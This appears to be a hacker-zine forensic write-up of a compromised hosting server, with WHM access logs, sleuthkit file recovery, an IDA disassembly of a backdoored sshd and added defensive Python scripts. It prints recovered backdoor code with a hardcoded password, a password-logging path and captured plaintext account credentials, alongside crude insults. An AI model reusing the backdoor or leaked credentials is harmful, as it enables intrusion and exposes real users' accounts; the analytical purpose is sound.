188.54.114.181 - root [06/08/2009:13:32:26 -0000] "GET /cPanel_magic_revision_1159323796/yui/container/assets/close12_1.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:29 -0000] "GET /yui/treeview/assets/loading.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:31 -0000] "GET /scripts/display_package_info?pkg=Basic HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:32 -0000] "POST /scripts/passwd HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:52 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:33:13 -0000] "GET /scripts2/securitycenter HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:33:29 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:33:53 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:34:35 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:34:39 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:35:16 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:36:18 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:37:19 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:38:00 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:39:01 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:39:49 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:02 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:13 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:23 -0000] "GET /scripts/editsets HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:31 -0000] "POST /scripts/saveedits HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/editsets" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:40 -0000] "GET /logout/ HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:40:41 -0000] "GET /logout/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - - [06/08/2009:13:40:46 -0000] "GET /3rdparty/phpMyAdmin/db_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 401 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=tblclients&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
root@srv01 [/home/recovery]#
|
||
|
||
root@srv01 [/home/recovery/]# cat /tmp/access_log | grep "06/08" | grep crownvip | grep -v 91.184
|
||
188.54.114.181 - root [06/08/2009:13:30:43 -0000] "GET /scripts/edituser?domain=crownvipservices.com&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:32:18 -0000] "GET /xml-api/accountsummary?user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
|
||
root@srv01 [/home/recovery]#
|
||
|
||
/*
RoMeO clearly has an issue with self image (probably due to a tiny penis) and feels the need to fake things like
breaking out of a jail shell to make himself feel better. In fact, I'll bet that RoMeO
couldn't hack his way out of a wet tissue paper bag with a knife.
*/
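The filtered log shows the account being added to and removed from the wheel group, and switched between normal and jailed shell, all through WHM as root within a few minutes. The following is an added example, not part of the original zine: Python that pairs such grant and revoke requests per account and reports how long each elevation lasted. The sample lines are constructed (placeholder IP, host and account names); reading `addwheel`/`rmwheel` and the `shell=` values as grant/revoke is an assumption drawn from the endpoint names in the log, and the month-first date order is assumed from the June date in the chkrootkit output.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Constructed sample in the layout of the access_log excerpt above.
# 203.0.113.7, whm.example.test, acct1 and acct2 are placeholders.
_ROWS = [
    ("13:30:43", "GET /scripts/edituser?domain=example.test&user=acct1", "0"),
    ("13:33:41", "GET /scripts/addwheel?compilers=0&user=acct1", "0"),
    ("13:34:49", "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=acct1", "0"),
    ("13:35:16", "GET /xml-api/loadavg", "200 0"),
    ("13:39:57", "GET /scripts/rmwheel?compilers=0&user=acct1", "0"),
    ("13:40:18", "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=acct1", "0"),
    ("13:41:02", "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=acct2", "0"),
]
SAMPLE_LOG = "\n".join(
    f'203.0.113.7 - root [06/08/2009:{t} -0000] "{req} HTTP/1.1" {st} '
    f'"https://whm.example.test:2087/scripts/command" "Mozilla/5.0 (constructed)"'
    for t, req, st in _ROWS
)

# Some lines in the excerpt carry "status size", others a single number.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?:(?P<status>\d+) )?(?P<size>\d+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
TS_FORMAT = "%m/%d/%Y:%H:%M:%S %z"  # assumption: month first (June 8)


def classify(path, query):
    """Map a WHM request to (privilege, 'grant' | 'revoke'), or None."""
    if path == "/scripts/addwheel":
        return ("wheel", "grant")
    if path == "/scripts/rmwheel":
        return ("wheel", "revoke")
    if path == "/scripts2/domanageshells":
        shell = query.get("shell", [""])[0]  # parse_qs turns '+' into ' '
        if shell == "Enable Normal Shell":
            return ("shell", "grant")
        if shell == "Enable Jailed Shell":
            return ("shell", "revoke")
    return None


def privilege_windows(log_text):
    """Pair grant/revoke requests per (account, privilege).

    Returns closed windows in the order they were revoked, followed by
    grants that were never revoked (revoked=None, seconds=None).
    """
    open_grants, windows = {}, []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m or m["user"] == "-":       # unparsable or unauthenticated
            continue
        url = urlsplit(m["target"])
        query = parse_qs(url.query)
        action = classify(url.path, query)
        account = query.get("user", [None])[0]
        if not action or not account:
            continue
        when = datetime.strptime(m["ts"], TS_FORMAT)
        privilege, kind = action
        key = (account, privilege)
        if kind == "grant":
            open_grants.setdefault(key, (when, m["ip"], m["user"]))
        elif key in open_grants:
            start, ip, actor = open_grants.pop(key)
            windows.append({
                "account": account, "privilege": privilege,
                "actor": actor, "source_ip": ip,
                "granted": start.isoformat(), "revoked": when.isoformat(),
                "seconds": int((when - start).total_seconds()),
            })
    for (account, privilege), (start, ip, actor) in open_grants.items():
        windows.append({
            "account": account, "privilege": privilege,
            "actor": actor, "source_ip": ip,
            "granted": start.isoformat(), "revoked": None, "seconds": None,
        })
    return windows


if __name__ == "__main__":
    for window in privilege_windows(SAMPLE_LOG):
        print(window)
```

Short-lived elevations that are reverted from the same source address are worth alerting on; a grant with no matching revoke is still in effect and needs review.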
|
||
|
||
|
||
root@srv01 [/home/recovery]# du -h /tmp/access_log
|
||
13M access_log
|
||
root@srv01 [/home/recovery]#
|
||
|
||
root@srv01 [/home/recovery]# strings /dev/sdb2 > stringfile_sdb2.txt
|
||
root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | head -n 25
|
||
M0J
|
||
/var
|
||
4JcA.JcA.J
|
||
runt+found
|
||
cache
|
||
empty
|
||
games
|
||
local
|
||
lock
|
||
nisl
|
||
mail
|
||
preserve
|
||
spool
|
||
crash
|
||
racoon
|
||
account
|
||
cpanel
|
||
named
|
||
portsentry
|
||
aquota.userr.bz2
|
||
profiles
|
||
quota.user
|
||
netenberg
|
||
haxtar.gz
|
||
ll.tar
|
||
|
||
/*
A forensic investigation demonstrated that RoMeO was full of shit again. Clearly there was no grsec local exploit
and certainly no jailshell break tool or technique. During the investigation we identified two suspicious files
that were ll.tar and haxtar.gz. Those were in fact logpatch v1.1 (he can't write his own tools) and a real "weak"
attempt at modifying the OpenSSH daemon to add a backdoor.
*/
|
||
|
||
root@srv01 [/home/recovery]# cat sdb2output.txt | grep -A 1 hax
|
||
d/d * 983041(realloc): hax
|
||
r/r * 98310: ll.tar
|
||
root@srv01 [/home/recovery]#
|
||
|
||
/*
With the use of sleuthkit in our investigation we validated the existence of the hax directory and the ll.tar
file on /dev/sdb2
*/
|
||
|
||
root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep hax
|
||
haxtar.gz
|
||
hax.tar
|
||
hax/
|
||
hax/auth-sia.c
|
||
hax/msg.h
|
||
hax/fatal.c
|
||
hax/config.guess
|
||
hax/progressmeter.h
|
||
hax/hostfile.c
|
||
hax/sftp-client.h
|
||
hax/includes.h
|
||
hax/serverloop.h
|
||
hax/session.c
|
||
hax/ssh-agent.c
|
||
hax/scp.c
|
||
hax/loginrec.c
|
||
hax/bufaux.c
|
||
hax/auth-pam.h
|
||
hax/auth-sia.h
|
||
hax/ttymodes.h
|
||
hax/ssh-keygen.0
|
||
hax/auth-rh-rsa.c
|
||
hax/auth-passwd.c
|
||
hax/key.h
|
||
hax/packet.c
|
||
hax/rsa.c
|
||
hax/compat.h
|
||
hax/authfile.c
|
||
hax/ssh-keysign.8
|
||
hax/auth1.c
|
||
hax/readconf.c
|
||
hax/ssh2.h
|
||
hax/bufaux.h
|
||
hax/sftp.0
|
||
hax/scard.c
|
||
hax/README.platform
|
||
hax/WARNING.RNG
|
||
hax/ssh_config.0
|
||
hax/dns.c
|
||
hax/.cvsignore
|
||
hax/auth-krb5.c
|
||
hax/misc.h
|
||
hax/auth2-kbdint.c
|
||
hax/kex.c
|
||
hax/sftp-common.c
|
||
hax/log.c
|
||
hax/entropy.c
|
||
hax/sshlogin.c
|
||
hax/servconf.h
|
||
hax/cipher-aes.c
|
||
hax/atomicio.c
|
||
hax/xmalloc.c
|
||
hax/fixpaths
|
||
hax/sshtty.c
|
||
hax/fixprogs
|
||
hax/ttymodes.c
|
||
hax/auth.c
|
||
hax/auth2-pubkey.c
|
||
hax/dispatch.h
|
||
hax/rijndael.h
|
||
hax/misc.c
|
||
hax/sftp-server.c
|
||
hax/sshd.c
|
||
hax/scard-opensc.c
|
||
hax/serverloop.c
|
||
hax/readpass.c
|
||
hax/rsa.h
|
||
hax/ssh-keysign.c
|
||
hax/canohost.h
|
||
hax/ssh.0
|
||
hax/aclocal.m4
|
||
hax/ssh-rand-helper.0
|
||
hax/deattack.h
|
||
hax/auth-bsdauth.c
|
||
hax/gss-serv.c
|
||
hax/monitor.h
|
||
hax/monitor_mm.h
|
||
hax/entropy.h
|
||
hax/ChangeLog
|
||
hax/log.h
|
||
hax/sshconnect.c
|
||
hax/kexgex.c
|
||
hax/sftp-server.0
|
||
hax/auth.h
|
||
hax/deattack.c
|
||
hax/channels.c
|
||
hax/ssh-keygen.1
|
||
hax/version.h
|
||
hax/sftp-glob.c
|
||
hax/nchan2.ms
|
||
hax/kexdhs.c
|
||
hax/ssh.1
|
||
hax/groupaccess.h
|
||
hax/rijndael.c
|
||
hax/ssh_prng_cmds.in
|
||
hax/cipher-3des1.c
|
||
hax/mac.c
|
||
hax/configure
|
||
hax/cipher-ctr.c
|
||
hax/ssh-add.c
|
||
hax/gss-genr.c
|
||
hax/scp.1
|
||
hax/TODO
|
||
hax/acss.c
|
||
hax/loginrec.h
|
||
hax/sftp-client.c
|
||
hax/progressmeter.c
|
||
hax/md5crypt.h
|
||
hax/opensshd.init.in
|
||
hax/moduli.c
|
||
hax/uuencode.c
|
||
hax/config.h.in
|
||
hax/buildpkg.sh.in
|
||
hax/auth2-gss.c
|
||
hax/nchan.c
|
||
hax/cleanup.c
|
||
hax/msg.c
|
||
hax/mac.h
|
||
hax/cipher-bf1.c
|
||
hax/kexdh.c
|
||
hax/auth-options.c
|
||
hax/moduli
|
||
hax/hostfile.h
|
||
hax/install-sh
|
||
hax/sshpty.h
|
||
hax/cipher.h
|
||
hax/auth-options.h
|
||
hax/monitor_wrap.h
|
||
hax/configure.ac
|
||
root@srv01 [/home/recovery]#
|
||
|
||
// Familiar filenames for an unfamiliar, poorly coded backdoor
|
||
|
||
root@srv01 [/home/recovery/sdb2recover/hax]# cat includes.h | grep -i hookar -A1 -B1
|
||
|
||
#define hookar "0x3aownt"
|
||
#define HOOKAR_LG "/etc/module-"
|
||
int hookarOn;
|
||
|
||
root@srv01 [/home/recovery/sdb2recover/hax]#
|
||
|
||
|
||
root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep -B 10 module-
|
||
# undef _INCLUDE__STDC__
|
||
# endif
|
||
#endif
|
||
#include <openssl/opensslv.h> /* For OPENSSL_VERSION_NUMBER */
|
||
#include "defines.h"
|
||
#include "version.h"
|
||
#include "openbsd-compat/openbsd-compat.h"
|
||
#include "openbsd-compat/bsd-nextstep.h"
|
||
#include "entropy.h"
|
||
#define hookar "0x3aownt"
|
||
#define HOOKAR_LG "/etc/module-"
|
||
|
||
/*
Partial source code recovered showing backdoor password. The rest of the code revealed the incoming
password logging that took place in /etc/module- which was used to hold captured data in plaintext form
*/
|
||
|
||
root@srv01 [/home/recovery]# cat etc/module- | head -n 10
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: x00mario:!&8bmHvt4--$
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: x00mario:!&8bmHvt4--$
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
login in: webhostl:kb>w5I@T&yK|
|
||
root@srv01 [/home/recovery]#
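The drop file above is the incident's exposure list: every account that authenticated while the modified sshd ran has to be treated as disclosed. Added example, not part of the original zine: Python that scopes the exposure from a file in this `login in: <user>:<password>` layout without echoing any captured secret. The sample content is constructed and every name in it is a placeholder.

```python
import hashlib
import re
from collections import OrderedDict

# Constructed drop-file content in the layout shown above; placeholders only.
SAMPLE_DROP = "\n".join([
    "login in: acct1:placeholder-one",
    "login in: acct1:placeholder-one",
    "login in: acct2:with:colons:inside",
    "login in: acct1:placeholder-two",
    "truncated line without the prefix",
    "login in: acct2:with:colons:inside",
    "login in: :empty-user",
])

# A Unix user name cannot contain ':', so the first ':' after the prefix
# separates user from password; the password itself may contain more colons.
ENTRY_RE = re.compile(r"^login in: ([^:\s]+):(.*)$")


def exposed_accounts(drop_text):
    """Summarise which accounts were captured, never returning a secret.

    Returns (report, rejected):
      report   - one dict per account in order of first appearance, with the
                 number of captures, the number of distinct passwords seen,
                 and the first/last line number of a capture
      rejected - line numbers that are non-empty but do not parse
    """
    accounts = OrderedDict()
    rejected = []
    for lineno, line in enumerate(drop_text.splitlines(), 1):
        m = ENTRY_RE.match(line)
        if not m:
            if line.strip():
                rejected.append(lineno)
            continue
        user, secret = m.groups()
        rec = accounts.setdefault(
            user, {"captures": 0, "digests": set(), "first": lineno, "last": lineno}
        )
        rec["captures"] += 1
        # Keep only a digest so distinct passwords can be counted without
        # holding or emitting the plaintext.
        rec["digests"].add(hashlib.sha256(secret.encode("utf-8")).digest())
        rec["last"] = lineno
    report = [
        {
            "user": user,
            "captures": rec["captures"],
            "distinct_passwords": len(rec["digests"]),
            "first_line": rec["first"],
            "last_line": rec["last"],
        }
        for user, rec in accounts.items()
    ]
    return report, rejected


if __name__ == "__main__":
    report, rejected = exposed_accounts(SAMPLE_DROP)
    for row in report:
        print(row)
    print("unparsed lines:", rejected)
```

More than one distinct password for an account means the user changed it while the logger was active, so both the old and the new value are disclosed.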
|
||
|
||
|
||
chkrootkit reports 1 deletion of record:
|
||
|
||
Checking `chkutmp'... The tty of the following user process(es) were not found
|
||
in /var/run/utmp !
|
||
! RUID PID TTY CMD
|
||
! root 5193 tty2 /sbin/mingetty tty2
|
||
! root 5194 tty3 /sbin/mingetty tty3
|
||
! root 5197 tty4 /sbin/mingetty tty4
|
||
! root 5211 tty5 /sbin/mingetty tty5
|
||
! root 5216 tty6 /sbin/mingetty tty6
|
||
chkutmp: nothing deleted
|
||
Checking `wted'... 1 deletion(s) between Tue Jun 8 11:40:56 2009 and Tue Jun 8 11:46:30 2009
|
||
|
||
|
||
Infected SSHD Binary Reverse Code Engineering
|
||
---------------------------------------------
|
||
|
||
//Global definitions
|
||
FILE *log; //A pointer to the password dump file
|
||
char *EtcModule = "/etc/module-"; //filename array of chars
|
||
char *a0x3aownt = "0x3aownt"; // hardcoded backdoor password
|
||
int hookarOn; //A backdoor authentication flag
|
||
|
||
//Standard passwd struct defined in pwd.h
|
||
struct passwd {
|
||
char *pw_name;
|
||
char *pw_passwd;
|
||
uid_t pw_uid;
|
||
gid_t pw_gid;
|
||
time_t pw_change;
|
||
char *pw_class;
|
||
char *pw_gecos;
|
||
char *pw_dir;
|
||
char *pw_shell;
|
||
time_t pw_expire;
|
||
};
|
||
//OpenSSH Authctxt struct defined in auth.h
|
||
struct Authctxt {
|
||
int success;
|
||
int postponed; /* authentication needs another step */
|
||
int valid; /* user exists and is allowed to login */
|
||
int attempt;
|
||
int failures;
|
||
int force_pwchange;
|
||
char *user; /* username sent by the client */
|
||
char *service;
|
||
struct passwd *pw; /* set if 'valid' */
|
||
char *style;
|
||
void *kbdintctxt;
|
||
#ifdef BSD_AUTH
|
||
auth_session_t *as;
|
||
#endif
|
||
#ifdef KRB5
|
||
krb5_context krb5_ctx;
|
||
krb5_ccache krb5_fwd_ccache;
|
||
krb5_principal krb5_user;
|
||
char *krb5_ticket_file;
|
||
char *krb5_ccname;
|
||
#endif
|
||
Buffer *loginmsg;
|
||
void *methoddata;
|
||
};
|
||
|
||
|
||
/*
|
||
.text:0804FA68 public sys_auth_passwd
|
||
.text:0804FA68 sys_auth_passwd proc near ; CODE XREF: auth_password+71p
|
||
.text:0804FA68
|
||
.text:0804FA68 arg_0 = dword ptr 8
|
||
.text:0804FA68 arg_4 = dword ptr 0Ch
|
||
.text:0804FA68
|
||
.text:0804FA68 push ebp
|
||
.text:0804FA69 mov ebp, esp
|
||
.text:0804FA6B push edi
|
||
.text:0804FA6C push esi
|
||
.text:0804FA6D push ebx
|
||
.text:0804FA6E sub esp, 0Ch
|
||
.text:0804FA71 mov eax, [ebp+arg_0] ; eax = authctxt
|
||
.text:0804FA74 mov ebx, [eax+8]
|
||
.text:0804FA77 test ebx, ebx
|
||
.text:0804FA79 mov edi, [ebp+arg_4] ; edi = password
|
||
.text:0804FA7C mov esi, [eax+20h] ; esi = authctxt->pw
|
||
.text:0804FA7F jnz loc_804FB28
|
||
.text:0804FA85 mov ebx, [esi+4]
|
||
.text:0804FA88
|
||
.text:0804FA88 loc_804FA88: ; CODE XREF: sys_auth_passwd+CEj
|
||
.text:0804FA88 mov al, [ebx]
|
||
.text:0804FA8A test al, al
|
||
.text:0804FA8C jnz short loc_804FA98
|
||
.text:0804FA8E cmp byte ptr [edi], 0
|
||
.text:0804FA91 mov edx, 1
|
||
.text:0804FA96 jz short loc_804FABD
|
||
.text:0804FA98
|
||
.text:0804FA98 loc_804FA98: ; CODE XREF: sys_auth_passwd+24j
|
||
.text:0804FA98 sub esp, 8
|
||
.text:0804FA9B test al, al
|
||
.text:0804FA9D jnz short loc_804FAC8
|
||
.text:0804FA9F
|
||
.text:0804FA9F loc_804FA9F: ; CODE XREF: sys_auth_passwd+66j
|
||
.text:0804FA9F mov eax, offset aXx ; "xx"
|
||
.text:0804FAA4 push eax
|
||
.text:0804FAA5 push edi
|
||
.text:0804FAA6 call xcrypt
|
||
.text:0804FAAB pop edx
|
||
.text:0804FAAC pop ecx
|
||
.text:0804FAAD push ebx ; s2
|
||
.text:0804FAAE push eax ; s1
|
||
.text:0804FAAF call _strcmp
|
||
.text:0804FAB4 add esp, 10h
|
||
.text:0804FAB7 xor edx, edx
|
||
.text:0804FAB9 test eax, eax
|
||
.text:0804FABB jz short loc_804FAEC
|
||
.text:0804FABD
|
||
.text:0804FABD loc_804FABD: ; CODE XREF: sys_auth_passwd+2Ej
|
||
.text:0804FABD ; sys_auth_passwd+7Fj
|
||
.text:0804FABD lea esp, [ebp-0Ch]
|
||
.text:0804FAC0 pop ebx
|
||
.text:0804FAC1 pop esi
|
||
.text:0804FAC2 mov eax, edx
|
||
.text:0804FAC4 pop edi
|
||
.text:0804FAC5 leave
|
||
.text:0804FAC6 retn
|
||
.text:0804FAC6 ; ---------------------------------------------------------------------------
|
||
.text:0804FAC7 align 4
|
||
.text:0804FAC8
|
||
.text:0804FAC8 loc_804FAC8: ; CODE XREF: sys_auth_passwd+35j
|
||
.text:0804FAC8 cmp byte ptr [ebx+1], 0
|
||
.text:0804FACC mov eax, ebx
|
||
.text:0804FACE jz short loc_804FA9F
|
||
.text:0804FAD0 push eax
|
||
.text:0804FAD1 push edi
|
||
.text:0804FAD2 call xcrypt
|
||
.text:0804FAD7 pop edx
|
||
.text:0804FAD8 pop ecx
|
||
.text:0804FAD9 push ebx ; s2
|
||
.text:0804FADA push eax ; s1
|
||
.text:0804FADB call _strcmp
|
||
.text:0804FAE0 add esp, 10h
|
||
.text:0804FAE3 xor edx, edx
|
||
.text:0804FAE5 test eax, eax
|
||
.text:0804FAE7 jnz short loc_804FABD
|
||
